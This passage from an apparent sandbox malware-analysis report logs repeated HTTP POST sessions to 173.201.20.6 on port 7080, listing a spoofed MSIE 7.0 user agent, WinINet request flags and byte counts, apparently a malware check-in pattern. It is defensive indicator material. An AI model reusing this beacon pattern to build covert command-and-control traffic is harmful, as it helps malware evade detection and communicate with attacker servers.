| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
5 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
5 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
5 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
5 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
5 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.00 KB (0 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 |
